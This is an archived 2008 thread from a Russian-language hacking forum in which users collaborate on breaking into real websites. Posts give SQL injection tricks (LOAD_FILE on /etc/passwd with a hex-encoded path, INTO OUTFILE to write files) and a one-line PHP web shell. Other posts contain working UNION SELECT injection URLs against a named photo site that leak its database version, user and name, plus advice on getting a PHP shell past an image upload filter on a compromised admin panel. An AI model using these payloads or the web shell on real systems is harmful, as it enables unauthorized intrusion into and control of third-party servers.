ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.09.2008, 20:05
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
DDoSька Если речь идёт о заливке через инъекцию, то необходимо, что-бы ковычки не фильтровались. Если ты не можешь прочитать файл так:
LOAD_FILE('/etc/passwd')
А можешь так :
LOAD_FILE(0x2f6574632f706173737764)
то скорее всего magic_quotes_gpc = on,
и через INTO OUTFILE залить не получится.
PS Для любителей докопаться: Я видел что винда, /etc/passwd для примера 
Последний раз редактировалось jokester; 08.09.2008 в 20:08..
|
|
|
08.09.2008, 20:24
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Сообщение от jokester
DDoSька Если речь идёт о заливке через инъекцию, то необходимо, что-бы ковычки не фильтровались. Если ты не можешь прочитать файл так:
LOAD_FILE('/etc/passwd')
А можешь так :
LOAD_FILE(0x2f6574632f706173737764)
то скорее всего magic_quotes_gpc = on,
и через INTO OUTFILE залить не получится.
PS Для любителей докопаться: Я видел что винда, /etc/passwd для примера
Фишка в том,что отклюбчен удаленный инклуд,
Warning: include() [function.include]: URL file-access is disabled in the server configuration
оцтой =\
Хотя если через бд выполнять не include.... а <? echo "lol"; ?> into.... то файл создаеться и все выполняеться,ДАЙТЕ самый маленький шелл плиз))
дайте самый маленький шелл))
|
|
|
|
08.09.2008, 20:29
|
|
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062
Репутация:
155
|
|
DDoSька
<?php system($cmd) ?>
|
|
|
|
08.09.2008, 20:35
|
|
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529
Репутация:
41
|
|
Опять я, опять Парюсь))
http://ua-foto.com/fotogal/:442%27/
День бюся результата ноль)
либо
http://ua-foto.com/eshop/121/0:226'/
он мне более нравица))
cms webo
При запросе:
http://ua-foto.com/eshop/121/0:226%20and%201=1%20order%20by%201/*
Уже надрываеца Unknown column '20and' in 'where clause'
Последний раз редактировалось tor4); 08.09.2008 в 22:16..
|
|
|
|
08.09.2008, 23:20
|
|
Новичок
Регистрация: 19.08.2007
Сообщений: 18
Провел на форуме:
182410
Репутация:
8
|
|
tor4) , вроде ничего выкрутить нельзя)
|
|
|
|
08.09.2008, 23:27
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
там 2 запроса к БД
|
|
|
|
08.09.2008, 23:36
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637
Репутация:
27
|
|
_http://ua-foto.com/eshop/143'
тут тоже скуля и раскрытие пути. может че-то накопаешь
а вот тут уже интереснее, нашёл:
_http://ua-foto.com/search/10/167/0/?&qs=&f[226]=&sf226=:3&sf447=-1)%20union%20select%201/*&f[447]=4&go=1&sort_type=1
перебрал и получил:
_http://ua-foto.com/search/10/167/0/?&qs=&f[226]=&sf226=:3&sf447=-1)%20UNION%20SELECT%201,2,3,4,5,6,7,8,concat_ws(0x 3a3a3a,version(),user(),database()),10,11,12,13,14 ,15,16,17,18,19,20,21,22/*&f[447]=4&go=1&sort_type=1
Поля вывода: 1,7,9,14. 9 самое нормально поле)
получили)
5.0.27:::uaphoto@localhost:::uaphoto
Последний раз редактировалось Grema; 08.09.2008 в 23:49..
|
|
|
|
09.09.2008, 17:24
|
|
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062
Репутация:
155
|
|
Похекал я админку на одном сайте, а там что бы загрузить файл на сервер можно использовать только скрипт загрузчика картинок
а в нем такой код присутствует
PHP код:
//File Name Check
if (( $file_name ==".jpg")||( $file_name ==".jpeg")||( $file_name ==".png")||( $file_name ==".gif"))
{
$message = "Invalid File Name Specified, be sure its a '.jpg'";
return $message;
}
и
PHP код:
//File Type Check
else if ( $file_type == "text/plain" ) {
$message = "Sorry, You cannot upload any script file" ;
return $message;
}
можно как то обойти эти фильтры? |
|
|
|
09.09.2008, 17:28
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
.Striker, увидеть бы объявление $file_name.
А вообще попробуй назвать файл shell.jpg.php и майм-тайп смени.
|
|
|
|
09.09.2008, 17:38
|
|
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062
Репутация:
155
|
|
пробовал загрузить обычную картинку оно не хочет
видимо они что то там накосячили |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
